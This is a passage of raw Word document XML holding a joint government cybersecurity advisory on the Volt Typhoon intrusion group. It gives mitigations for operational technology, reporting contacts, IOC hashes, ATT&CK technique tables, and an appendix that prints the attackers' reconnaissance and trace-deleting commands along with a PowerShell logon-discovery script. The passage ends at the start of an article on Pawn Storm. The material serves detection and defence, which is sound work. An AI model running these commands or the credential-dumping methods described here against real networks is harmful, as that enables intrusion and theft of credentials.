          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Require that passwords for all OT password-protected assets be at least 15 characters, when technically feasible. In instances where minimum passwords lengths are not technically feasible (for example, assets in remote locations), apply compensating controls, record the controls, and log all login attempts. [CPG 2B].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enforce strict access policies for accessing OT networks. Develop strict operating procedures for OT operators that details secure configuration and usage.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Segment OT assets from IT environments by [CPG 2F]: Denying all connections to the OT network by default unless explicitly allowed (e.g., by IP address and port) for specific system functionality. Requiring necessary communications paths between IT and OT networks to pass through an intermediary, such as a properly configured firewall, bastion host, "jump box," or a demilitarized zone (DMZ), which is closely monitored, captures network logs, and only allows connections from approved assets.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Closely monitor all connections into OT networks for misuse, anomalous activity, or OT protocols.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Monitor for unauthorized controller change attempts. Implement integrity checks of controller process logic against a known good baseline. Ensure process controllers are prevented from remaining in remote program mode while in operation if possible.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Lock or limit set points in control processes to reduce the consequences of unauthorized controller access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Be prepared by: Determining your critical operational processes' reliance on key IT infrastructure: Maintain and regularly update an inventory of all organizational OT assets. Understand and evaluate cyber risk on "as-operated" OT assets.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Create an accurate "as-operated" OT network map and identify OT and IT network inter-dependencies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Identifying a resilience plan that addresses how to operate if you lose access to or control of the IT and/or OT environment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Plan for how to continue operations if a control system is malfunctioning, inoperative, or actively acting contrary to the safe and reliable operation of the process.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Develop workarounds or manual controls to ensure ICS networks can be isolated if the connection to a compromised IT environment creates risk to the safe and reliable operation of OT processes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Create and regularly exercise an incident response plan.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Regularly test manual controls so that critical functions can be kept running if OT networks need to be taken offline.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement regular data backup procedures on OT networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Regularly test backup procedures.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Follow risk-informed guidance in the joint advisory NSA and CISA Recommend Immediate Actions to Reduce Exposure Across all Operational Technologies and Control Systems, the NSA advisory Stop Malicious Cyber Activity Against Connected Operational Technology. CONTACT INFORMATION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 organizations: To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact: CISA's 24/7 Operations Center at Report@cisa.gov or (888) 282-0870 or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Water and Wastewater Systems Sector organizations, contact the EPA Water Infrastructure and Cyber Resilience Division at watercyberta@epa.gov to voluntarily provide situational awareness.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Entities required to report incidents to DOE should follow established reporting requirements, as appropriate. For </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>other energy sector inquiries, contact EnergySRMA@hq.doe.gov.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>For transportation entities regulated by TSA, report to CISA Central in accordance with the requirements found in applicable Security Directives, Security Programs, or TSA Order.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Australian organizations: Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.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Canadian organizations: Report incidents by emailing CCCS at contact@cyber.gc.ca.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New Zealand organizations: Report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654.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United Kingdom organizations: Report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973. VALIDATE SECURITY CONTROLS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addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.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 get started: Select an ATT&amp;CK technique described in this advisory (see Table 5 through Table 17).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Align your security technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test your technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Analyze your detection and prevention technologies' performance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Tune your security program, including people, processes, and technologies, based on the data generated by this process.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authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory. REFERENCES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[1] fofa [2] Microsoft: Volt Typhoon targets US critical infrastructure with living- off-the-land techniques [3] GitHub - fatedier/frp: A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet [4] GitHub - sandialabs/gait: Zeek Extension to Collect Metadata for Profiling of Endpoints and Proxies [5] The Zeek Network Security Monitor RESOURCES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Microsoft: Volt Typhoon targets US critical infrastructure with living-off- the-land techniques Secureworks: Chinese Cyberespionage Group BRONZE SILHOUETTE Targets U.S. Government and Defense Organizations DISCLAIMER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information in this report is being provided "as is" for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies. ACKNOWLEDGEMENTS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Fortinet and Microsoft contributed to this advisory. VERSION HISTORY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February 7, 2024: Initial Version. APPENDIX A: VOLT TYPHOON OBSERVED COMMANDS / LOTL ACTIVITY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See Table 2 and Table 3 for Volt Typhoon commands and PowerShell scripts observed by the U.S. authoring agencies during incident response activities. For additional commands used by Volt Typhoon, see joint advisory People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection. Table 2: Volt Typhoon Observed Commands in PowerShell Console History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Command/Script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Description/Use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Get-EventLog security -instanceid 4624 -after {redacted date} | fl * | Out- File 'C:\users\public\documents\user.dat'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PowerShell command extracts security log entries with the Event ID 4624 after a specified date. The output is formatted (fl *) and saved to user.dat. Potentially used to analyze logon patterns and identify potential targets for lateral movement.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Get-EventLog security -instanceid 4624 | Where-Object {$_.message.contains('{redacted user account}')} | select -First 1 | fl *</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PowerShell command extracts security log entries with the Event ID 4624 and filters them to include only those containing a specific user account, selecting the first instance of such an event.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wminc process get name,processid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Appears to be an attempt to use the wmic command but with a misspelling (wminc instead of wmic). This command, as it stands, would not execute successfully and would return an error in a typical Windows environment. This could indicate a mistake made during manual input.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wmic process get name,processid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WMI command lists all running processes with process names and process IDs. Potentially used to find process IDs needed for other operations, like memory dumping.</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tasklist /v</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Command displays detailed information about currently running processes, including the name, PID, session number, and memory usage.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taskkill /f /im rdpservice.exe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Command forcibly terminates the process rdpservice.exe. Potentially used as a cleanup activity post-exploitation.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ping -n 1 {redacted IP address}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Command sends one ICMP echo request to a specified IP address.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ping -n 1 -w 1 {redacted IP address}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Command sends one ICMP echo request to a specified IP address with a timeout (-w) of 1 millisecond.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 user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all user accounts on the local machine or domain, useful for quickly viewing existing user accounts.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quser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query user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Displays information about user sessions on a system, aiding in identifying active users or sessions.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 start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all active services.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cmd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Opens a new instance of the command prompt.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cd [Redacted Path]</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Changes the current directory to a specified path, typically for navigating file systems.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Remove-Item .\Thumbs.db</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PowerShell command to delete the Thumbs.db file, possibly for cleanup or removing traces.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move .\Thumbs.db ttt.dat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Relocates and renames the file Thumbs.db in the current directory to ttt.dat within the same directory.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del .\Thumbs.db /f /s /q</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Force deletes Thumbs.db files from the current directory and all subdirectories, part of cleanup operations to erase traces.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del ??</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Deletes files with two-character names, potentially a targeted cleanup command.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del /?</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Displays help information for the del command.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exit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Terminates the command prompt session.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ipconfig</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Retrieves network configuration details, helpful for discovery and mapping the victim's network.</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 time /dom</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Queries or sets the network time for a domain, potentially used for reconnaissance or to manipulate system time.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netstta -ano</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Intended as netstat -ano; a mistyped command indicating a potential operational error.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netstat -ano</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Lists active network connections and processes, helpful for identifying communication channels and potential targets.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type .\Notes.txt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Displays the contents of Notes.txt, possibly used for extracting specific information or intelligence gathering.</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logoff</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Logs off the current user session. Table 3: Volt Typhoon Observed PowerShell Scripts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Script name and location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Contents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Description/Use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C:\{redacted}\ logins.ps1</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Find DC list from Active Directory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$DCs = Get-ADDomainController -Filter *</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Define time for report (default is 1 day)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$startDate = (get-date).AddDays(-1)</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Store successful logon events from security logs with the specified dates and workstation/IP in an array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foreach ($DC in $DCs){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$slogonevents = Get-Eventlog -LogName Security -ComputerName $DC.Hostname - after $startDate | where {$_.eventID -eq 4624 }}</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Crawl through events; print all logon history with type, date/time, status, account name, computer and IP address if user logged on remotely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foreach ($e in $slogonevents){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Logon Successful Events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Local (Logon Type 2)</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if (($e.EventID -eq 4624 ) -and ($e.ReplacementStrings[8] -eq 2)){</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write-host "Type: Local Logon`tDate: "$e.TimeGenerated "`tStatus: Success`tUser: "$e.ReplacementStrings[5] "`tWorkstation: "$e.ReplacementStrings[11]</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Remote (Logon Type 10)</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if (($e.EventID -eq 4624 ) -and ($e.ReplacementStrings[8] -eq 10)){</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write-host "Type: Remote Logon`tDate: "$e.TimeGenerated "`tStatus: Success`tUser: "$e.ReplacementStrings[5] "`tWorkstation: "$e.ReplacementStrings[11] "`tIP Address: "$e.ReplacementStrings[18]</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script is designed for user logon discovery in a Windows Active Directory environment. It retrieves a list of DCs and then queries security logs on these DCs for successful logon events (Event ID 4624) within the last day. The script differentiates between local (Logon Type 2) and remote (Logon Type 10) logon events. For each event, it extracts and displays details including the logon type, date/time of logon, status, account name, and the workstation or IP address used for the logon. Volt Typhoon may be leveraging this script to monitor user logon activities across the network, potentially to identify patterns, gather credentials, or track the movement of users and administrators within the network. APPENDIX B: INDICATORS OF COMPROMISE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See Table 4 for Volt Typhoon IOCs obtained by the U.S. authoring agencies during incident response activities.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Note: See MAR-10448362-1.v1 for more information on this malware. Table 4: Volt Typhoon Malicious Files and Associated Hashes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File Name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Description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MD5</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Hashes (SHA256)</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BrightmetricAgent.exe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file is an FRP that could be used to reveal servers situated behind a network firewall or obscured through Network Address Translation (NAT).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fd41134e8ead1c18ccad27c62a260aa6</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edc0c63065e88ec96197c8d7a40662a15a812a9583dc6c82b18ecd7e43b13b70</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SMSvcService.exe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file is a Windows executable "FRPC" designed to open a reverse proxy between the compromised system and the threat actor(s) C2 server.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b1de37bf229890ac181bdef1ad8ee0c2</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99b80c5ac352081a64129772ed5e1543d94cad708ba2adc46dc4ab7a0bd563f1</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APPENDIX C: MITRE ATT&amp;CK TACTICS AND TECHNIQUES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See Table 5 through Table 17 for all referenced threat actor tactics and techniques in this advisory. Table 5: Volt Typhoon actors ATT&amp;CK Techniques for Enterprise - Reconnaissance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Reconnaissance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Technique Title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Gather Victim Host Information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T1592</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 conducts extensive pre-compromise reconnaissance. This includes web searches, including victim-owned sites, for victim host, identity, and network information, especially for information on key network and IT administrators.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Gather Victim Identity Information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T1589</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 conducts extensive pre-compromise reconnaissance to learn about the target organization's staff.</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Gather Victim Identity Information: Email Addresses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T1589.002</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 targets the personal emails of key network and IT staff.</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Gather Victim Network Information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T1590</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 conducts extensive pre-compromise reconnaissance to learn about the target organization's network.</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Gather Victim Org Information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T1591</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 conducts extensive pre-compromise reconnaissance to learn about the target organization.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Search Open Websites/Domains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T1593</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 conducts extensive pre-compromise reconnaissance. This includes web searches, including victim-owned sites, for victim host, identity, and network information, especially for information on key network and IT administrators.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Search Victim-Owned Websites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T1594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 conducts extensive pre-compromise reconnaissance. This includes web searches, including victim-owned sites, for victim host, identity, and network information, especially for information on key network and IT administrators. Table 6: Volt Typhoon actors ATT&amp;CK Techniques for Enterprise - Resource Development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Resource Development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Technique Title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Acquire Infrastructure: Botnet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T1583.003</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 uses multi-hop proxies for command-and-control infrastructure. The proxy is typically composed of Virtual Private Servers (VPSs) or small office/home office (SOHO) routers.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Compromise Infrastructure: Botnet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T1584.005</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 used Cisco and NETGEAR end-of-life SOHO routers implanted with KV Botnet malware to support their operations.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Compromise Infrastructure: Server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T1584.004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 has redirected specific port traffic to their proxy infrastructure, effectively converting the PRTG's Detection Guidance server into a proxy for their C2 traffic.</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Develop Capabilities: Exploits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T1587.004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 uses publicly available exploit code, but is also adept at discovering and exploiting vulnerabilities as zero days.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Obtain Capabilities: Exploits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T1588.005</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 uses publicly available exploit code, but is also adept at discovering and exploiting vulnerabilities as zero days. Table 7: Volt Typhoon actors ATT&amp;CK Techniques for Enterprise - Initial Access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Initial Access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Technique Title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Exploit Public-Facing Application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T1190</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 commonly exploits vulnerabilities in networking appliances such as Fortinet, Ivanti (formerly Pulse Secure), NETGEAR, Citrix, and Cisco.</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External Remote Services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T1133</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 often uses VPN sessions to securely connect to victim environments, enabling discreet follow-on intrusion activities. Table 8: Volt Typhoon actors ATT&amp;CK Techniques for Enterprise - Execution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Execution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Technique Title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Command and Scripting Interpreter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T1059</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 uses hands-on-keyboard execution for their malicious activity via the command-line.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Command and Scripting Interpreter: PowerShell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T1059.001</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 has executed clients via PowerShell.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Command and Scripting Interpreter: Unix Shell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T1059.004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 has used Brightmetricagent.exe, which contains multiplexer libraries that can bi-directionally stream data over through NAT networks and contains a command-line interface (CLI) library that can leverage command shells such as PowerShell, Windows Management, Instrumentation (WMI), and Z Shell (zsh).</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Windows Management Instrumentation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T1047</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 has used Windows Management Instrumentation Console (WMIC) commands. Table 9: Volt Typhoon actors ATT&amp;CK Techniques for Enterprise - Persistence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Persistence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Technique Title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Valid Accounts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T1078</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Volt Typhoon primarily relies on valid credentials for persistence. Table 10: Volt Typhoon actors ATT&amp;CK Techniques for Enterprise - Privilege Escalation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Privilege Escalation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Technique Title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Exploitation for Privilege Escalation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T1068</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 first obtains credentials from public-facing appliances after gaining initial access by exploiting privilege escalation vulnerabilities in the operating system or network services. Table 11: Volt Typhoon actors ATT&amp;CK Techniques for Enterprise - Defense Evasion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Defense Evasion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Technique Title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Direct Volume Access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T1006</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 has executed the Windows-native vssadmin command to create a volume shadow copy.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Indicator Removal: Clear Persistence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T1070.009</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 has selectively cleared Windows Event Logs, system logs, and other technical artifacts to remove evidence of their intrusion activity and masquerading file names.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Indicator Removal: Clear Windows Event Logs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T1070.001</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 has selectively cleared Windows Event Logs, system logs, and other technical artifacts to remove evidence of their intrusion activity and masquerading file names.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Indicator Removal: File Deletion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T1070.004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 created systeminfo.dat in C:\Users\Public\Documents, but subsequently deleted it.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Masquerading: Match Legitimate Name or Location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T1036.005</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 has selectively cleared Windows Event Logs, system logs, and other technical artifacts to remove evidence of their intrusion activity and masquerading file names.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Modify Registry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T1112</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 has used the netsh command, a legitimate Windows command, to create a PortProxy registry modification on the PRTG server.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Obfuscated Files or Information: Software Packing</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T1027.002</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 has obfuscated FRP client files (BrightmetricAgent.exe and SMSvcService.exe) and the command-line port scanning utility ScanLine by packing the files with Ultimate Packer for Executables (UPX).</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System Binary Proxy Execution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T1218</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 uses hands-on-keyboard activity via the command-line and use other native tools and processes on systems (often referred to as "LOLBins"), known as LOTL, to maintain and expand access to the victim networks. Table 12: Volt Typhoon actors ATT&amp;CK Techniques for Enterprise - Credential Access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Credential Access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Technique Title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Brute Force: Password Cracking</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T1110.002</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 has exfiltrated NTDS.dit and SYSTEM registry hive to crack passwords offline.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Credentials from Password Stores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T1555</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 has installed browsers saved passwords history, credit card details, and cookies.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Credentials from Password Stores: Credentials from Web Browsers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T1555.003</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 has strategically targeted network administrator web browser data, focusing on both browsing history and stored credentials.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OS Credential Dumping: LSASS Memory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T1003.001</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Volt Typhoon used a DLL with MiniDump and the process ID of Local Security Authority Subsystem Service (LSASS) to dump the LSASS process memory and obtain credentials.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OS Credential Dumping: NTDS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T1003.003</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 appears to prioritize obtaining valid credentials by extracting the Active Directory database file (NTDS.dit).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Unsecured Credentials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T1552</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 has obtained credentials insecurely stored on an appliance.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Unsecured Credentials: Private Keys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T1552.004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 has accessed a Local State file that contains the Advanced Encryption Standard (AES) encryption key used to encrypt the passwords stored in the Chrome browser, which enables the actors to obtain plaintext passwords stored in the Login Data file in the Chrome browser. Table 13: Volt Typhoon actors ATT&amp;CK Techniques for Enterprise - Discovery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Discovery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Technique Title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Account Discovery: Local Account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T1087.001</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 executed net user and quser for user account information.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Application Window Discovery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T1010</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 created and accessed a file named rult3uil.log on a Domain Controller in C:\Windows\System32\. The rult3uil.log file contained user activities on a compromised system, showcasing a combination of window title information and focus shifts, keypresses, and command executions across Google Chrome and Windows PowerShell, with corresponding timestamps.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Browser Information Discovery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T1217</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 has installed browsers saved passwords history, credit card details, and cookies.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File and Directory Discovery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T1083</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 enumerated several directories, including directories containing vulnerability testing and cyber related content and facilities data, such as construction drawings.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Log Enumeration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T1654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 has captured successful logon events.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Network Service Discovery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T1046</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 has used commercial tools, LOTL utilities, and appliances already present on the system for system information, network service, group, and user discovery.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Peripheral Device Discovery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T1120</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 has obtained the victim's system screen dimension and display devices information.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Permission Groups Discovery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T1069</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 has used commercial tools, LOTL utilities, and appliances already present on the system for system information, network service, group, and user discovery.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Process Discovery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T1057</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 executed tasklist /v to gather a detailed process listing.</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Query Registry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T1012</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 has interacted with a PuTTY application by enumerating existing stored sessions.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Software Discovery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T1518</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 has obtained the victim's list of applications installed on the victim's system.</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System Information Discovery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T1082</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 has used commercial tools, LOTL utilities, and appliances already present on the system for system information, network service, group, and user discovery.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System Location Discovery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T1614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 has obtained the victim's system current locale.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System Network Configuration Discovery: Internet Connection Discovery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T1016.001</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 employs ping with various IP addresses to check network connectivity and net start to list running services.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System Owner/User Discovery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T1033</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 has used commercial tools, LOTL utilities, and appliances already present on the system for system information, network service, group, and user discovery.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System Service Discovery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T1007</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 employs ping with various IP addresses to check network connectivity and net start to list running services.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System Time Discovery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T1124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 has obtained the victim's system timezone. Table 14: Volt Typhoon actors ATT&amp;CK Techniques for Enterprise - Lateral Movement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Lateral Movement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Technique Title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Remote Service Session Hijacking</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T1563</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 potentially had access to a range of critical PuTTY profiles, including those for water treatment plants, water wells, an electrical substation, operational technology systems, and network security devices. This would enable them to access these critical systems.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Remote Services: Cloud Services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T1021.007</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During the period of Volt Typhoon's known network presence, there were anomalous login attempts to an Azure tenant potentially using credentials previously compromised from theft of NTDS.dit.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Remote Services: Remote Desktop Protocol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T1021.001</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 has moved laterally to the Domain Controller via an interactive RDP session using a compromised account with domain administrator privileges.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Use Alternate Authentication Material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T1550</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 may be capable of using other methods such as Pass the Hash or Pass the Ticket for lateral movement.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Valid Accounts: Cloud Accounts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T1078.004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During the period of Volt Typhoon's known network presence, there were anomalous login attempts to an Azure tenant potentially using credentials previously compromised from theft of NTDS.dit. Table 15: Volt Typhoon actors ATT&amp;CK Techniques for Enterprise - Collection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Collection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Technique Title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Archive Collected Data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T1560</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 collected sensitive information obtained from a file server in multiple zipped files.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Archive Collected Data: Archive via Utility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T1560.001</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 has compressed and archived the extracted ntds.dit and accompanying registry files (by executing ronf.exe, which was likely a renamed version of rar.exe).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Data Staged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T1074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 accessed the file C:\Users\{redacted}\Downloads\History.zip, which presumably contained data from the User Data directory of the user's Chrome browser, which the actors likely saved in the Downloads directory for exfiltration.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Screen Capture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T1113</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Volt Typhoon has obtained a screenshot of the victim's system using two libraries (gdi32.dll and gdiplus.dll) Table 16: Volt Typhoon actors ATT&amp;CK Techniques for Enterprise - Command and Control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Command and Control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Technique Title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Encrypted Channel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T1573</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 has setup FRP clients on a victim's corporate infrastructure to establish covert communications channels for command and control.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Ingress Tool Transfer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T1105</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 uses legitimate, but outdated versions of network admin tools. For example, in one confirmed compromise, actors downloaded an outdated version of comsvcs.dll, on the DC in a non-standard folder.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Proxy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T1090</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 has setup FRP clients on a victim's corporate infrastructure to establish covert communications channels for command and control.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Proxy: Internal Proxy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T1090.001</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 has used the netsh command, a legitimate Windows command, to create a PortProxy registry modification on the PRTG server.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Proxy: Multi-hop Proxy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T1090.003</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 uses multi-hop proxies for command-and-control infrastructure. Table 17: Volt Typhoon actors ATT&amp;CK Techniques for Enterprise - Exfiltration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Exfiltration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Technique Title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Use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Exfiltration Over Alternative Protocol</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T1048</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Volt Typhoon exfiltrated files via Server Message Block (SMB).</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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2024.02.07 20:54</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Pawn Storm Uses Brute Force and Stealth Against High-Value Targets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Based on our estimates, from approximately April 2022 until November 2023, Pawn Storm attempted to launch NTLMv2 hash relay attacks through different methods, with huge peaks in the number of targets and variations in the government departments that it targeted.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By: Feike Hacquebord, Fernando Merces January 31, 2024</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Subscribe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Introduction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Pawn Storm (also known as APT28 and Forest Blizzard) is an advanced persistent threat (APT) actor that shows incessant and lasting repetitions in its tactics, techniques, and procedures (TTPs). Some of the group's campaigns involve using the same kind of technical tricks repeatedly, sometimes targeting hundreds of people in a single organization at the same time.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threat actor is known for still using its phishing email campaigns that are over a decade old and are sent to high-value targets around the world. Although the methods and infrastructure of these campaigns gradually change over time, they still provide valuable intelligence on Pawn Storm's infrastructure, including the ones it uses in more advanced campaigns.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This apparent lack of sophistication does not necessarily mean that the threat actor is not successful or that the campaigns are not advanced in nature. On the contrary, we have clear indications that Pawn Storm has compromised thousands of email accounts over time, with some of these seemingly repetitive attacks being cleverly designed and stealthy. Some also use advanced TTPs. The loudness of the repetitive, oftentimes crude and aggressive campaigns, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
